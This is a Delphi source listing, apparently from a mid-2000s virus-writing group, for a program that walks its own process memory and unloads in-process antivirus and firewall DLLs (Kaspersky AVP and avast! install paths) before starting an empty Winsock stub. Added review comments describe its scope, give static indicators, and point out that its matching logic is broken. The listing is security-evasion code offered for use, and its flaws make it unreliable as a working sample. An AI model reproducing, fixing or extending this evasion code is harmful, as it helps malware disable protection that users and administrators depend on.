Kartikey Sapra
Firewall bypassing
coded by : Hs32-Idir.
big thank's to : aphex , madshi.

INFO :
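This example walks the module list of its own process, looks for firewall and antivirus DLLs that were injected into the process memory, and unloads them. It only acts on protection that lives in user-mode DLLs inside this one process.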
}

program HsIdirbypass; {program name}

uses windows,InjectionCode,Winsock;

var
{ Path fragments of the security products whose in-process DLLs are targeted.
  BypassingAvi matches them with Pos against each module's file name, so they
  are substring matches without a drive letter. The first two look like the
  default install folders of Kaspersky AVP and Alwil avast! (inferred from the
  folder names); the third is a placeholder left by the author. }
firwallCompany : Array[1..3] of string = ('\Program Files\Avp\','\Program Files\Alwil Software\','\Program Files\Enter Your Firlwall Folder\');
{ Author banner. It is not referenced anywhere in the visible source.
  NOTE(review): if the string survives into the compiled binary, it and the
  path fragments above are usable as static indicators for this sample. }
Coder : String = 'Passive Socket, Lost firwall Coded by Hs32-Idir';

{ Enumerates the modules mapped into the current process and calls
  UninjectLibrary on a module whose file name contains an entry of
  firwallCompany.

  Scope: every call uses GetCurrentProcess, so the procedure acts only on
  DLLs loaded into this process. Nothing here touches other processes,
  services or drivers. A product whose network or behaviour monitoring depends
  solely on a DLL loaded into the monitored process loses visibility into this
  process once that DLL is gone; enforcement done outside the process is not
  affected by this code.

  Defensive notes: the event of interest is the security product's own module
  being unloaded from a process it is supposed to monitor, before that process
  performs any network activity.

  UninjectLibrary and InjectString are not defined in this file; they
  presumably come from the InjectionCode unit in the uses clause, and their
  exact behaviour is not visible here.

  NOTE(review): as published the matching logic is not reliable. ModuleCount
  is incremented twice per module and is used directly as the index into the
  three-element firwallCompany array, so a module is compared with a single
  entry only and the index leaves the declared range 1..3 after the second
  module found. }
procedure BypassingAvi; { unloads security-product modules from this process }
var
Module, Base: pointer;
ModuleCount: integer;
lpModuleName: array [0..MAX_PATH] of char;
MemoryBasicInformation: TMemoryBasicInformation;
begin
ModuleCount := 0;
// Start the walk at address 0; Base remembers the previous allocation base.
Module := nil;
Base := nil;
// Query one memory region per iteration until VirtualQueryEx stops returning a full record.
while VirtualQueryEx(GetCurrentProcess, Module, MemoryBasicInformation, SizeOf(MemoryBasicInformation)) = SizeOf(MemoryBasicInformation) do
begin
// A region counts as a module when it is committed, starts a new allocation
// (its base differs from the previous one and equals the region's own base
// address) and GetModuleFileName returns a name for that base.
if (MemoryBasicInformation.State = MEM_COMMIT) and(MemoryBasicInformation.AllocationBase <> Base) and (MemoryBasicInformation.AllocationBase = MemoryBasicInformation.BaseAddress) and (GetModuleFileName(dword(MemoryBasicInformation.AllocationBase), lpModuleName, MAX_PATH) > 0) then
begin
// The counter is advanced twice for every module found.
ModuleCount := ModuleCount + 1;
Inc(ModuleCount);
// Substring match of one path entry against the module's file name.
if Pos(firwallCompany[ModuleCount],pChar(@lpModuleName[0])) > 0 then
// Only this call is governed by the if above: ask for the matching module to be unloaded.
UninjectLibrary(GetCurrentProcess, pChar(@lpModuleName[0]));
// Not part of the if: this runs for every module that passed the outer test.
InjectString(GetCurrentProcess,'Library Injected with Firwall Cleaned from this application');
end;
Base := MemoryBasicInformation.AllocationBase;
// Advance to the next region. The pointer is cast to dword for the addition,
// which presumably ties this code to 32-bit targets.
dword(Module) := dword(Module) + MemoryBasicInformation.RegionSize;
end;
end;

{ Placeholder for the network code that is meant to run after BypassingAvi.
  The body is empty in the published sample; the author left the Winsock part
  to the reader. }
procedure startpassiveSocket;
begin
// Empty on purpose: no socket code is included in this listing.
end;

{ Program entry. The order is the point of the sample: the module unload runs
  before any socket code, so user-mode hooks removed by BypassingAvi are
  already gone when network calls would start. }
begin
BypassingAvi; { first pass over the loaded modules, unloading the matches }
Sleep(50); { wait 50 ms before continuing }
startpassiveSocket; { then start the socket code, an empty stub in this listing }

{
Written by Hs32-Idir[V-P] - 2006-2007
MSN : Hs32-Idir@VirusProducts.Hack
Web : wWw.Hs32-Idir.110mb.Com
}